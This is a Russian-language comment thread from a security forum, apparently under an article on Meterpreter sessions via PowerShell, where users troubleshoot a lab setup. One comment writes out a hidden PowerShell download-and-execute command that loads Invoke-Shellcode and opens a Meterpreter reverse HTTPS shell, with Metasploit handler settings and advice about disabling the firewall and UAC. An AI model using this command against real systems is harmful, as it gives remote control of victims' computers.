• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

S

stilya

Ничего не понятно...что копировать и куда вставлять и что менять?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Ничего не понятно...что копировать и куда вставлять и что менять?
Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...
 
S

stilya

Ничего не копируйте,никуда не вставляйте -- это может причинить вред вашему компьютеру...
А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
А как же проверить работу всего этого мануала...да и что с ним будет...поставлю систему заново. делов то...15 минут
Мануал расчитан,на то что у людей которые его читают есть хоть какое то понятие о том что они делают. Вы уж простите ,но если вы ничего не поняли с этого мануала - то будет лучше для вас и окружающих если прекратите свои експеременты...
 
S

stilya

Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Ну а как же понять...и как научиться никто не хочет помочь.
[doublepost=1484053847,1484053367][/doublepost]Как понял вы это делали на виртуалке...аналогично что на метасплойт кали линукс, если вы это имели ввиду...то конечно же это понятно...но работает ли это на реальных машинах...у меня есть два компа, на которых я могу третиноваться...может все-таки поможете?
Да, я демонстрирую это на виртуальных машинах:
Во первых - это этично
Во вторых - как вы себе представляете фото и видео на камеру таких демонстраций.
Интересно... Назовите причины , по которым это не будет работать на реальных устройствах.
 
S

stilya

Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams
 
T

TPoD

Как не открою ваши статьи, так обязательно что-то очень "привлекательное" увижу :) спасибо большое
 
  • Нравится
Реакции: <~DarkNode~>

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Причина как раз в том что машины на которых я тестирую реальные, их специально я отвел для ушатывания...через неделю другую системы будут хлопнуты и опять тестить...
и я не утверждал...только предположил...может быть именно в этом причина?
[doublepost=1484054627,1484054534][/doublepost]Почему я решил именно на реальных...потому что создавал прокси сервера на вирте...все работало, пока это решил сделать в реале...и пришлось идти на другие сайты и все по новому создавать от debian до sams
Запомни святую истину, всё, что работает в одном сегменте сети будет работать и в другом в том числе и в интернете
 
G

Grafsky

Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.
 

SooLFaa

Platinum
15.07.2016
898
1 559
BIT
19
Ааээмм, а разве ПШ актуален? Давайте еще проги на нем попишем, можно же.
Хааааххх. Начиная с вин 7, пауэршелл не просто акутален а стало основной пушкой которой до сих пор можно даже винду раздолбать. Совсем недавно я демонстрировал как подгрузить макрос с ПШ в ексельку.
 
  • Нравится
Реакции: ghostphisher

animi

Green Team
06.12.2016
52
46
BIT
0
что-то не получается. один ноут на win 7 на другом кали 1. запускаю на кали use exploit/multi/handler и set payload windows/meterpreter/reverse_https. в винде (Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString(' link removed Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.37 -Lport 8443 -Force) lhost и lport одинаковый. сделал в винде Set-ExecutionPolicy Unrestricted отключил брандмауэр отключил контроль учетных записей и сессия не приходит. netstat -na не показывает соединения, но в процессы висят. в какую сторону копать?
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
7
Я наверное где то что то упустил.. На виндовой машине открываю PS,вписываю ссылку и свой реверс в команду,отправляю - PS захлопывается а сессия не прилетает. В чём проблема ?
 
G

Gl@balWar

Возник вопрос,возможно не по теме....Но как можно сохранить сессию по данному способу так,что бы к ней можно было подключиться из под другой сети ?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!